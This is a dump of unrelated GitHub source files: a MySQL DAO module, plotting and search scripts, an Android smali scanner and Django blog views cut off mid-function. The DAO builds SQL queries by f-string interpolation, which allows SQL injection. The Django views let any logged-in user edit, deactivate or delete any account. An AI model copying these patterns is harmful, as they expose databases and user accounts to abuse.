published_at: str, room: str) -> None:\n event_insert_query = f\"\"\"\n INSERT INTO event (id, session_id, event_name, published_at, room)\n VALUES (\n '{id}',\n {session_id},\n '{event_name}',\n STR_TO_DATE('{published_at[:-1]}000', '%Y-%m-%dT%H:%i:%s.%f'),\n '{room}');\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(event_insert_query)\n\n\ndef get_session_info(device_id: str) -> Session:\n fetch_session_query = f\"\"\"\n SELECT *\n FROM session\n WHERE device_id = '{device_id}'\n ORDER BY datetime_started DESC\n LIMIT 1;\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_session_query)\n\n session_record = cursor.fetchone()\n return Session(**session_record)\n\n\ndef get_last_action(session_id: int) -> Optional[Action]:\n fetch_last_action = f\"\"\"\n SELECT a.id, triggering_event_id, `type` AS action_type, body, action_taken\n FROM `action` a\n JOIN event e ON triggering_event_id = e.id\n WHERE session_id = {session_id}\n ORDER BY published_at DESC\n LIMIT 1;\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_last_action)\n\n action = cursor.fetchone()\n if action is None:\n return None\n else:\n return Action(**action)\n\n\ndef get_events_today(session_id: int) -> List[Event]:\n fetch_events_today = f\"\"\"\n SELECT *\n FROM event\n WHERE session_id = {session_id}\n AND DATE(published_at) = CURRENT_DATE();\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(fetch_events_today)\n\n return [Event(**event) for event in cursor.fetchall()]\n\n\ndef get_messages(session_id: int) -> List[str]:\n get_messages_query = f\"\"\"\n SELECT message_text\n FROM message\n WHERE session_id = {session_id};\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(get_messages_query)\n\n messages = [message[\"message_text\"] for message in cursor.fetchall()]\n return messages\n\n\ndef update_message_index(session_id: int, new_index_value: int) -> None:\n update_index_query = f\"\"\"\n UPDATE session\n SET message_index = {new_index_value}\n WHERE id = {session_id};\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(update_index_query)\n\n\ndef insert_action_into_table(triggering_event_id: str, action_type: str, body: str):\n action_insert_query = f\"\"\"\n INSERT INTO `action` (triggering_event_id, `type`, body, action_taken)\n VALUES (\n '{triggering_event_id}',\n '{action_type}',\n '{body}',\n NOW());\n \"\"\"\n ensure_db_connection()\n\n with __get_cursor() as cursor:\n cursor.execute(action_insert_query)\n","repo_name":"scan-lan/sentinoodleMotionHandler","sub_path":"dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6243039735","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nsample_rate = 48e3\nfreq = 7e3\nN = 256\nn = np.arange(N)\ny = np.sin(2 * np.pi * freq \\\n * (n / sample_rate)) \\\n + np.random.normal(\n 0, .1, N)\nplt.plot(n, y)\nplt.title('Signal over Time')\nplt.ylabel('Amplitude')\nplt.xlim(0, N)\nplt.xlabel('Time (samples)')\nplt.savefig(\"exampleplt.png\")\n","repo_name":"testaco/dcc2014","sub_path":"preso/img/exampleplt.py","file_name":"exampleplt.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"23387251701","text":"def 
checkrow(ind,jnd, n ,m):\r\n for k in xrange(m):\r\n if(int(a[ind][k]) !=1):\r\n return False\r\n return True\r\ndef checkcol(ind,jnd, n ,m):\r\n for k in xrange(n):\r\n if(int(a[k][jnd]) !=1):\r\n return False\r\n return True\r\n\r\nT = int(raw_input())\r\na = []\r\nfor testcase in xrange(T):\r\n a = []\r\n nm = (raw_input()).split(' ')\r\n n = int(nm[0])\r\n m = int(nm[1])\r\n sucess = True\r\n for rows in range(n):\r\n row = (raw_input()).split(' ')\r\n a.append(row)\r\n for i in xrange(n):\r\n for j in xrange(m):\r\n if int(a[i][j]) == 1:\r\n if(not (checkrow(i,j , n,m) or checkcol(i,j , n,m) )):\r\n sucess = False\r\n break\r\n if(not sucess):\r\n print(\"Case #\"+str(testcase+1)+\": NO\")\r\n break\r\n if (sucess):\r\n print(\"Case #\"+str(testcase+1)+\": YES\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/1508.py","file_name":"1508.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34241692098","text":"from .geo_base import GeoObject\nfrom .point_vector import Point3D\n\n\nclass Triangle(GeoObject):\n def __init__(self, point_a, point_b, point_c, material):\n self.a = Point3D(point_a)\n self.b = Point3D(point_b)\n self.c = Point3D(point_c)\n self.u = self.a.vector_to(self.b)\n self.w = self.a.vector_to(self.c)\n self.material = material\n\n def intersection_param(self, ray):\n p = self.a.vector_to(ray.origin)\n dw = ray.direction % self.w\n dwu = dw * self.u\n\n if dwu == 0:\n return None\n pu = p % self.u\n r = dw * p / dwu\n s = pu * ray.direction / dwu\n if 0 <= r and r <= 1 and 0 <= s and s <= 1 and r+s <= 1:\n return pu * self.w / dwu\n else:\n return None\n\n def normal_vec_at(self, p):\n return (self.u % self.w).normalize()\n","repo_name":"SicktorHass/RayTracer2019","sub_path":"src/geo_objects/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"300821536","text":"from ..Base import Base\nfrom ..info import Info\nfrom ..apk import register\nfrom ..tools import *\n\nTITLE = 'Arbitrary read and write detection of database files'\nLEVEL = 2\nINFO = 'Detect whether there is any risk of reading and writing database files in the App'\n\n\nclass DBCheck(Base):\n def scan(self):\n strline = cmdString('grep -r \"Landroid/content/Context;->openOrCreateDatabase\" ' + self.appPath)\n paths = getSmalis(os.popen(strline).readlines())\n results = []\n for path in paths:\n with open(path, 'r') as f:\n lines = f.readlines()\n lines.reverse()\n count = len(lines)\n name = getFileName(path)\n for i in range(0, count):\n line = lines[i]\n if 'Landroid/content/Context;->openOrCreateDatabase' in line:\n v = line.split(',')[2]\n for j in range(i, count):\n ll = lines[j]\n if 'const/4' in ll and v in ll:\n value = ll.strip().split(' ')[-1]\n if value != '0x0':\n result = name + ' : ' + str(count - i)\n if result not in results:\n results.append(result)\n break\n Info(key=self.__class__, title=TITLE, level=LEVEL, info=INFO, result='\\n'.join(results)).description()\n\n\nregister(DBCheck)","repo_name":"Ba-hub/R3verseBug","sub_path":"lib/Android/DBCheck.py","file_name":"DBCheck.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21193887508","text":"######################################################\n# Nama file: 
readline.py\n######################################################\n\ndef main():\n # open the file\n f = open(\"data.txt\", \"r\")\n\n # read the data line by line\n while True:\n baris = f.readline()\n if not baris: # EOF (end of file)\n break\n print(baris, end='')\n\n # close the file\n f.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"romanbatavi/kickstarter-python","sub_path":"bab/bab-7/readline.py","file_name":"readline.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30235114634","text":"import pandas as pd\n#uniform cost search\nfrom pandas import DataFrame\n_city_info = None\n\n_frontier_priority = []\n\nclass Node:\n def __init__(self, state, parent, action, path_cost):\n self.state = state\n self.parent = parent\n self.action = action\n self.path_cost = path_cost\n\ndef main():\n global _frontier_priority\n import_city_info()\n citys = []\n src_state = input('start_state:')\n des_state = input('des_state:')\n node = uniform_cost_search(src_state, des_state)\n if not node:\n print('find goal failed')\n else:\n while True:\n if node == None:\n break\n else:\n citys.append(node.state)\n node = node.parent\n size = len(citys)\n for i in range(size):\n if i < size - 1:\n print('%s->' % citys.pop(), end='')\n else:\n print(citys.pop())\n\ndef import_city_info():\n global _city_info\n data = [{'city1': 'Oradea', 'city2': 'Zerind', 'path_cost': 71},\n {'city1': 'Oradea', 'city2': 'Sibiu', 'path_cost': 151},\n {'city1': 'Zerind', 'city2': 'Arad', 'path_cost': 75},\n {'city1': 'Arad', 'city2': 'Sibiu', 'path_cost': 140},\n {'city1': 'Arad', 'city2': 'Timisoara', 'path_cost': 118},\n {'city1': 'Timisoara', 'city2': 'Lugoj', 'path_cost': 111},\n {'city1': 'Lugoj', 'city2': 'Mehadia', 'path_cost': 70},\n {'city1': 'Mehadia', 'city2': 'Drobeta', 'path_cost': 75},\n {'city1': 'Drobeta', 'city2': 'Craiova', 'path_cost': 120},\n {'city1': 'Sibiu', 'city2': 'Fagaras', 'path_cost': 99},\n {'city1': 'Sibiu', 'city2': 'Rimnicu Vilcea', 'path_cost': 80},\n {'city1': 'Rimnicu Vilcea', 'city2': 'Craiova', 'path_cost': 146},\n {'city1': 'Rimnicu Vilcea', 'city2': 'Pitesti', 'path_cost': 97},\n {'city1': 'Craiova', 'city2': 'Pitesti', 'path_cost': 138},\n {'city1': 'Fagaras', 'city2': 'Bucharest', 'path_cost': 211},\n {'city1': 'Pitesti', 'city2': 'Bucharest', 'path_cost': 101},\n {'city1': 'Bucharest', 'city2': 'Giurgiu', 'path_cost': 90},\n {'city1': 'Bucharest', 'city2': 'Urziceni', 'path_cost': 85},\n {'city1': 'Urziceni', 'city2': 'Vaslui', 'path_cost': 142},\n {'city1': 'Urziceni', 'city2': 'Hirsova', 'path_cost': 98},\n {'city1': 'Neamt', 'city2': 'Iasi', 'path_cost': 87},\n {'city1': 'Iasi', 'city2': 'Vaslui', 'path_cost': 92},\n {'city1': 'Hirsova', 'city2': 'Eforie', 'path_cost': 86}]\n\n _city_info = DataFrame(data, columns=['city1', 'city2', 'path_cost'])\n\n\ndef is_node_in_frontier(frontier, child):\n for x in frontier:\n if child.state == x.state:\n return True\n return False\n\ndef uniform_cost_search(src_state, des_state):\n global _city_info\n global _frontier_priority\n node = Node(src_state, None, None, 0)\n _frontier_priority_add(node)\n visited = []\n while True:\n if len(_frontier_priority) == 0:\n return False\n node = _frontier_priority.pop(0)\n if node.state == des_state:\n print('goal found!')\n return node\n visited.append(node.state)\n for i in range(len(_city_info)):\n des_city = ''\n if _city_info['city1'][i] == node.state:\n des_city = _city_info['city2'][i]\n
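# roads are undirected, so a city can appear as either endpoint in the table\n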
elif _city_info['city2'][i] == node.state:\n des_city = _city_info['city1'][i]\n if des_city == '':\n continue\n child = Node(des_city, node, 'go', node.path_cost + _city_info['path_cost'][i])\n if child.state not in visited and not is_node_in_frontier(_frontier_priority, child):\n _frontier_priority_add(child)\n elif is_node_in_frontier(_frontier_priority, child):\n _frontier_priority_replace(child)\n\ndef _frontier_priority_add(node):\n global _frontier_priority\n size = len(_frontier_priority)\n for i in range(size):\n if node.path_cost < _frontier_priority[i].path_cost:\n _frontier_priority.insert(i, node)\n return\n _frontier_priority.append(node)\n\ndef _frontier_priority_replace(child):\n global _frontier_priority\n size = len(_frontier_priority)\n for i in range(size):\n if child.state == _frontier_priority[i].state and child.path_cost < _frontier_priority[i].path_cost:\n _frontier_priority[i] = child\n return\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"han1254/IntroductionToAI","sub_path":"chapt3/3_4_2_ucs.py","file_name":"3_4_2_ucs.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14963578577","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 03 14:56:47 2016\r\n\r\n@author: admin12\r\n\"\"\"\r\n\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nGMs = 4 * (math.pi**2)\r\n\r\ndef initial(a,e): \r\n x0=a*(1+e) \r\n y0=0 \r\n v_x0=0 \r\n v_y0=2 * math.pi * math.sqrt((1-e)/(a*(1+e))) \r\n return [x0,y0,v_x0,v_y0]\r\n\r\ndef orbit(a, e, theta0, dt, total_time):\r\n q = initial(1 ,e)\r\n x0 = q[0]\r\n y0 = q[1]\r\n v_x0 = q[2]\r\n v_y0 = q[3]\r\n x = [x0]\r\n y = [y0]\r\n vx = [v_x0]\r\n vy = [v_y0]\r\n t = [0]\r\n omega = [0]\r\n theta = [theta0]\r\n while t[-1] < total_time:\r\n r=math.sqrt(x[-1]**2 + y[-1]**2)\r\n newvx = vx[-1] - GMs * x[-1] / (r ** 3) * dt\r\n newx = x[-1] + newvx * dt\r\n newvy = vy[-1] - GMs * y[-1] / (r ** 3) * dt\r\n newy = y[-1] + newvy * dt\r\n vx.append(newvx)\r\n vy.append(newvy)\r\n x.append(newx)\r\n y.append(newy)\r\n newomega = omega[-1] - 3 * GMs / (r ** 5) * (x[-1] * math.sin(theta[-1]) - y[-1] * math.cos(theta[-1])) * (x[-1] * math.cos(theta[-1]) + y[-1] * math.sin(theta[-1])) * dt\r\n newtheta = theta[-1] + newomega * dt\r\n if newtheta >= math.pi:\r\n newtheta = newtheta - 2 * math.pi\r\n if newtheta <= -math.pi:\r\n newtheta = newtheta + 2 * math.pi\r\n omega.append(newomega)\r\n theta.append(newtheta)\r\n t.append(t[-1] + dt)\r\n return [vx, vy, x, y, omega, theta, t]\r\n\r\ndef dtheta(theta1, theta2):\r\n delta_theta = []\r\n for i in range(len(theta1)):\r\n delta_theta.append(abs(theta1[i] - theta2[i]))\r\n return delta_theta\r\n\r\nA = orbit(1, 0.7, 0, 0.0001, 7)\r\nA_theta = A[5]\r\nA_omega = A[4]\r\nA_t = A[6]\r\nx1 = A[2]\r\ny1 = A[3]\r\n\r\nB = orbit(1, 0.7, 0.01, 0.0001, 7)\r\nB_theta = B[5]\r\nB_omega = B[4]\r\nB_t = B[6]\r\n\r\nC = orbit(1, 0.3, 0, 0.0001, 7)\r\nC_theta = C[5]\r\nC_omega = C[4]\r\nC_t = C[6]\r\n\r\nD = orbit(1, 0.3, 0.01, 0.0001, 7)\r\nD_theta = D[5]\r\nD_omega = D[4]\r\nD_t = D[6]\r\n\r\nangle = dtheta(A_theta, B_theta)\r\nangle1 = dtheta(C_theta, D_theta)\r\n\r\nplt.figure(figsize=[10,5])\r\nplt.subplot(121)\r\nplt.plot(C_t, angle)\r\nplt.title('$\\Delta\\\\theta$ versus time')\r\nplt.xlabel('time(yr)')\r\nplt.ylabel('$\\Delta\\\\theta$(radians)')\r\nplt.text(3,0.00001,'Elliptical orbit($e=0.7$)')\r\nplt.semilogy(0.0001, 0.1)\r\nplt.subplot(122)\r\nplt.plot(C_t,
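# right-hand panel: angular divergence of the two e=0.3 runs\r\n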
angle1)\r\nplt.title('$\Delta\\theta$ versus time')\r\nplt.xlabel('time(yr)')\r\nplt.ylabel('$\Delta\\theta$(radians)')\r\nplt.text(3,0.0000004,'Elliptical orbit($e=0.3$)')\r\nplt.semilogy(0.0001, 0.1)\r\nplt.savefig('r',dpi=144)\r\n \r\n \r\n ","repo_name":"Zemel-Yang/computationalphysics_N2014301020092","sub_path":"Code/Hyperion.py","file_name":"Hyperion.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23009683244","text":"\nfrom mpi4py import MPI\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Initialization for parallelization\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n# Initialization for Bifurcation diagram\nsteps = 500\nn = [500, 330, 250, 200, 160, 140, 120]\nran = np.linspace(0, 4, size*n[size-2])\n\ndef bifurcation_map(r, x):\n return r*x*(1-x)\n\n# Initialization for who takes which piece of r\ndistr = len(ran)//(size)\n\nlist_of_distr = list(range(0, len(ran), distr))\nlist_of_distr.append(len(ran))\n\nlist_to_send = []\nfor i in range(len(list_of_distr)-1):\n list_to_send.append([list_of_distr[i],list_of_distr[i+1]])\n\n\n# Parallelization itself\nsendbuf = None\nRs_send = None\nif rank == 0:\n sendbuf = np.empty([size*n[size-2], steps], dtype='f')\n sendbuf.T[:,:] = range(size*n[size-2])\n\n Rs_send = np.empty([size*n[size-2], steps], dtype='f')\n Rs_send.T[:,:] = range(size*n[size-2])\n\nrecvbuf = np.empty((n[size-2], steps), dtype='f')\ncomm.Scatter(sendbuf, recvbuf, root=0)\n\nRs_res = np.empty((n[size-2], steps), dtype='f')\ncomm.Scatter(Rs_send, Rs_res, root=0)\n\nlist_to_send = list_to_send[rank]\n\nj = -1\nfor r in ran[list_to_send[0]:list_to_send[1]]:\n j += 1\n x = np.random.random()\n for i in range(steps):\n recvbuf[j, i] = x\n Rs_res[j, i] = r\n x = bifurcation_map(r, x)\n\ncomm.Barrier()\n\ncomm.Gather(recvbuf, sendbuf, root=0)\ncomm.Gather(Rs_res, Rs_send, root=0)\n\nif rank == 0:\n Rs_send = Rs_send[:,Rs_send.shape[1]//2:]\n sendbuf = sendbuf[:,sendbuf.shape[1]//2:]\n Rs_send = Rs_send.reshape(Rs_send.shape[0]*Rs_send.shape[1])\n sendbuf = sendbuf.reshape(sendbuf.shape[0]*sendbuf.shape[1])\n plt.figure(figsize=(9, 8))\n plt.title('Bifurcation map')\n plt.xlabel(\"r\")\n plt.ylabel(\"x\")\n plt.plot(Rs_send, sendbuf, 'r.', markersize=1)\n plt.grid()\n plt.pause(1)\n \n","repo_name":"lenaNzrva/HPPL","sub_path":"Bifurcation diagram/Nazarova_Parallel_Bifurcation_diagram.py","file_name":"Nazarova_Parallel_Bifurcation_diagram.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2395330988","text":"import sentry_sdk\nfrom fastapi import FastAPI\nfrom fastapi.staticfiles import StaticFiles\nfrom sentry_sdk.integrations.asgi import SentryAsgiMiddleware\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api.api_v1.api import api_router\nfrom app.core.config import settings\nfrom app.core.logging import logger\nfrom app.kafka import producer\n\napp = FastAPI(\n title=settings.PROJECT_NAME, openapi_url=f\"{settings.API_V1_STR}/openapi.json\"\n)\n\nif settings.SENTRY_DSN_URL is not None:\n sentry_sdk.init(settings.SENTRY_DSN_URL)\n\n app.add_middleware(SentryAsgiMiddleware)\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n logger.info(\"starting kafka producer\")\n await producer.start()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n await producer.stop()\n\n\n# Set all CORS
enabled origins\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n expose_headers=[\"*\"],\n )\n\napp.include_router(api_router, prefix=settings.API_V1_STR)\napp.mount(\n settings.IMAGE_URL_PREFIX,\n StaticFiles(directory=settings.IMAGE_STATIC_DIR),\n name=\"image\",\n)\n","repo_name":"OpenChemistry/distiller","sub_path":"backend/app/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23586984201","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 21:31:02 2017\r\n\r\n@author: Ameet\r\n\"\"\"\r\nimport decimal\r\n\r\n\r\nimport decimal\r\nimport math\r\nimport itertools\r\n\r\ndef get_surface_area(pancakes):\r\n side_area = sum([2*decimal.Decimal(math.pi)*p[0]*p[1] for p in pancakes])\r\n max_r = max([p[0] for p in pancakes])\r\n top_areas = decimal.Decimal(math.pi)*decimal.Decimal(max_r)**2\r\n #print(pancakes,side_area + top_areas)\r\n \r\n return side_area + top_areas\r\n\r\ndef get_best_stack_exhaustive(N, K, pancakes):\r\n best_area = 0\r\n for comb in itertools.combinations(pancakes, r=K):\r\n sa = get_surface_area(comb)\r\n if sa>best_area:\r\n best_area = sa\r\n \r\n return best_area\r\n\r\n\r\ndef get_best_stack(N, K, pancakes):\r\n assert(len(pancakes)>0)\r\n assert(N>0)\r\n assert(K>0)\r\n assert(len(pancakes)==N)\r\n \r\n \r\n max_surface_area = decimal.Decimal(0)\r\n\r\n counter = 0 \r\n for pancake in pancakes:\r\n top_area = decimal.Decimal(math.pi)*pancake[0]**2\r\n side_area = 2*decimal.Decimal(math.pi)*pancake[0]*pancake[1]\r\n side_surface_areas = [2*decimal.Decimal(math.pi)*pancakes[i][0]*pancakes[i][1] for i in range(N) if pancakes[i][0]<=pancake[0] and i!=counter]\r\n side_areas_used = sum(sorted(side_surface_areas,reverse=True)[:K-1])\r\n total_area = decimal.Decimal(top_area) + decimal.Decimal(side_area) + decimal.Decimal(side_areas_used)\r\n if total_area>max_surface_area:\r\n max_surface_area = total_area\r\n \r\n \r\n return max_surface_area\r\n\r\ndef test_get_best_stack():\r\n N=2\r\n K=1\r\n pancakes = [(100,20),(200,10)]\r\n assert(abs(get_best_stack(N,K,pancakes)-decimal.Decimal(138230.076757951))/pagina/\",\n views.ArticleListView.as_view(),\n name=\"article-list\"\n ),\n path(\n \"kennis//bewerken\",\n views.ArticleEditView.as_view(),\n name=\"article-edit\"\n ),\n path(\n \"kennis//favorite\",\n views.favorite_article,\n name=\"article-favorite\"\n ),\n path(\n \"kennis//like\",\n views.like_article,\n name=\"article-like\"\n ),\n path(\n \"kennis//comment\",\n views.create_comment,\n name=\"article-comment\"\n ),\n path(\n \"kennis//\",\n views.ArticleDetailView.as_view(),\n name=\"article-detail\"\n ),\n path(\n \"nieuwekennis/pagina\",\n views.ArticleCreateView.as_view([ArticleFormPage1, ArticleFormPage2]),\n name=\"article-create-page\"\n ),\n path(\n \"nieuwekennis/\",\n views.ArticleCreateView.as_view([ArticleFormPage1, ArticleFormPage2]),\n name=\"article-create\"\n ),\n]\n","repo_name":"Ludicrux/Kennisdeler","sub_path":"apps/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2866887986","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms 
import *\nfrom .models import *\nfrom datetime import datetime\nfrom django.contrib.auth import login,authenticate,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.base import ContentFile\n\n# Home\ndef inicio(request):\n # ordered by post content\n if Post.objects.exists():\n todos_post=todosPost()\n first_post=primerPost('')\n else:\n todos_post=''\n first_post='' \n \n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post':first_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n\n# Forms\n@login_required\ndef formularioPosts(request):\n\n if request.method == 'POST':\n\n miFormulario = formularioPost(request.POST,request.FILES)\n \n if miFormulario.is_valid():\n \n informacion = miFormulario.cleaned_data\n \n\n post = Post(\n usuario_post=request.user,\n titulo_post = informacion['titulo_post'],\n subtitulo_post = informacion['subtitulo_post'],\n fecha_post =datetime.now() ,\n contenido_post = informacion['contenido_post'] ,\n estatus_post = True, \n )\n\n if informacion['imagen_post'] is not None:\n post.imagen_post=informacion['imagen_post']\n \n\n post.save()\n\n miFormulario = formularioPost()\n\n return render(request, 'FECODER_APP/post/formularioPosts.html', {\"postCreado\":post,\"form_post\":miFormulario,'avatar':img(request)}) \n \n \n else:\n miFormulario = formularioPost()\n\n return render(request, 'FECODER_APP/post/formularioPosts.html', {\"form_post\":miFormulario,'avatar':img(request)})\n\ndef formularioContactos(request):\n \n if request.method == 'POST':\n\n miFormulario = formularioContacto(request.POST)\n print(\"error\")\n if miFormulario.is_valid():\n informacion = miFormulario.cleaned_data\n contacto = Contacto(nombre_contacto = informacion['nombre_contacto'], celular_contacto =informacion['celular_contacto'] ,correo_contacto=informacion['correo_contacto'], mensaje=informacion['mensaje'])\n contacto.save()\n\n miFormulario = formularioContacto()\n\n return render(request, 'FECODER_APP/inicio.html', {\"contactoCreado\":contacto,\"formularioContacto\":miFormulario,'todos_post':todosPost(),'first_post':primerPost(''),'avatar':img(request)}) \n \n else:\n miFormulario = formularioContacto()\n\n return render(request, 'FECODER_APP/inicio.html', {\"formularioContacto\":miFormulario,'todos_post':todosPost(),'first_post':primerPost(''),'avatar':img(request)})\n\n# Search\ndef buscandoPost(request):\n post=request.GET['titulo']\n todos_post=todosPost()\n primer_post=primerPost(post)\n if post!=\"\":\n obj = Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=post).first()\n \n if obj: \n return render(request, 'FECODER_APP/inicio.html',{'post':obj,'titulo':post,'todos_post':todos_post,'first_post':obj,'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n return render(request, 'FECODER_APP/inicio.html',{'x':\"No existe post con el nombre \"+post,'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n else:\n return render(request, 'FECODER_APP/inicio.html',{\"error\":\"No se ingreso un nombre de post\",'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n\ndef buscarPost(request):\n return render(request, 'FECODER_APP/inicio.html',{'avatar':img(request)})\n\n@login_required\ndef buscandoContacto(request):\n nombre=request.GET['nombre']\n if nombre!=\"\":\n obj =
Contacto.objects.filter(nombre_contacto__icontains=nombre)\n if obj: \n return render(request, 'FECODER_APP/buscarContacto.html',{'contacto':obj,'nombre':nombre,'avatar':img(request)})\n \n return render(request, 'FECODER_APP/buscarContacto.html',{'x':\"No existe contacto con el nombre \"+nombre,'avatar':img(request)})\n else:\n return render(request, 'FECODER_APP/buscarContacto.html',{\"errorContacto\":\"No se ingreso un nombre de contacto\",'avatar':img(request)})\n \ndef buscarContacto(request):\n return render(request, 'FECODER_APP/buscarContacto.html',{'avatar':img(request)})\n\n\n# Users\ndef loginUser(request):\n redirect_to = request.POST.get('next', '')\n if request.method == 'POST':\n form = LoginForm(request, request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n todos_post=todosPost()\n primer_post=primerPost('')\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n else:\n return render(request, 'FECODER_APP/usuario/login.html',{'form_login':form,'mensaje':f\"Usuario o contraseña incorrectos\"})\n \n else:\n form = LoginForm()\n return render(request, 'FECODER_APP/usuario/login.html', {'form_login': form})\n\ndef registroUser(request):\n \n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n username=form.cleaned_data['username']\n form.save()\n avatar=Avatar(user=User.objects.get(username=username))\n # USE THIS TO RENAME THE PHOTO TO THE USER ID\n # avatar.imagen.name=username+\".png\"\n avatar.save()\n return render(request, 'FECODER_APP/usuario/login.html',{'mensaje_login':f\"Usuario registrado correctamente {username}\"})\n \n return render(request, 'FECODER_APP/usuario/registro.html',{'form_register':form,'error':form.errors})\n\n else:\n form = RegisterForm()\n return render(request, 'FECODER_APP/usuario/registro.html', {'form_register': form})\n\ndef logoutUser(request):\n todos_post=todosPost()\n primer_post=primerPost('')\n logout(request)\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post': primer_post, 'formularioContacto':formularioContacto()})\n\n@login_required\ndef editandoUsuario(request,id):\n user = User.objects.filter(id=id).first()\n if request.method == 'POST':\n form = editarUsuario(request.POST,request.FILES)\n check = request.POST.get(\"avatar-clear\", None)\n if form.is_valid():\n user.username=form.cleaned_data['username']\n user.email=form.cleaned_data['email']\n if form.cleaned_data['first_name']:\n user.first_name=form.cleaned_data['first_name']\n if form.cleaned_data['last_name']:\n user.last_name=form.cleaned_data['last_name']\n \n user.save()\n if form.cleaned_data['avatar']:\n avatar = Avatar.objects.get(user=user)\n avatar.imagen = form.cleaned_data['avatar']\n avatar.imagen.name=user.username+\".png\"\n avatar.save()\n else:\n if check:\n avatar = Avatar.objects.get(user=user)\n avatar.imagen = 'avatars/default.png'\n avatar.name=user.username+\".png\"\n avatar.save()\n \n \n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n\n else:\n avatar=Avatar.objects.get(user=user.id)\n form =
editarUsuario(initial={'username':user.username,'email':user.email,'avatar':avatar.imagen,'first_name':user.first_name,'last_name': user.last_name})\n return render(request, 'FECODER_APP/usuario/editarPerfil.html', {'form_editar': form,'avatar':img(request),'user':user})\n\n@login_required\ndef cambiarContraseña(request):\n user = request.user\n if request.method == 'POST':\n form = editarContraseña(request.user,request.POST)\n if form.is_valid():\n user = form.save()\n \n return render(request, 'FECODER_APP/usuario/login.html')\n \n \n\n else:\n form = editarContraseña(request.user)\n return render(request, 'FECODER_APP/usuario/cambiarContraseña.html', {'form_cambiarContraseña': form,'avatar':img(request),})\n\n@login_required\ndef mostrarPerfiles(request):\n usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n@login_required\ndef desactivarPerfil(request,id):\n usuario=User.objects.get(id=id)\n if usuario.is_active:\n usuario.is_active=False\n usuario.save()\n else:\n usuario.is_active=True\n usuario.save()\n usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n@login_required\ndef eliminarPerfil(request,id):\n usuario=User.objects.get(id=id)\n usuario.delete()\n 